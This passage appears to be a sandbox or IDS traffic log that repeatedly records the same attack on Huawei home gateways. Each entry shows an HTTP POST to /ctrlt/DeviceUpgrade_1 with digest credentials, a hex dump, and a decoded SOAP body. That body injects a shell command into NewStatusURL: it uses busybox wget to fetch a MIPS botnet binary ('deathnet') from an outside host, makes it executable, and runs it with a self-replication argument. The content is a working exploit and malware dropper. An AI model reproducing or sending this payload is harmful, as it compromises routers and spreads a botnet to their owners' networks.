63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 